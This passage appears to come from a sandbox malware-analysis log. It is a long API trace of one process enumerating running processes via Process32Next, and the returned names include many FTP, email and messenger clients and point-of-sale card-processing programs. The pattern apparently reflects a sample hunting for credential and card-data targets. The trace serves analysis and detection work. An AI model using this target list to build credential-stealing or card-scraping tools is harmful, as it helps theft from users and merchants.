dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.861] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.863] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.865] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.867] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.869] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.870] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.872] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.873] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.875] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.877] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.878] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.880] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.881] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.883] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.884] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.997] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.999] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.001] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0242.003] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0242.005] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.007] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.009] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0242.012] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0242.013] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0242.014] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0242.016] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.017] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0242.018] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.020] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.021] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.022] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0242.024] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0242.025] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0242.029] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0242.030] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0242.032] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0242.034] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0242.035] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0242.036] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0242.038] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0242.039] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0242.040] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0242.149] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0242.150] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0242.177] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0242.179] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0242.180] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0242.182] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0242.184] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0242.186] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0242.187] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0242.188] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0242.190] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0242.191] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0242.192] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0242.194] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0242.196] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0242.197] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0242.201] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0242.204] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0242.207] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0242.210] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0242.212] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0242.278] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0242.280] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0242.282] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0242.284] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0242.286] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0242.288] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0242.291] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0242.294] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0242.297] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0242.299] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0242.300] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0242.302] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0242.304] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0242.305] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0242.307] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0242.310] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0242.312] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0242.314] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0242.315] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0242.317] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0242.318] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 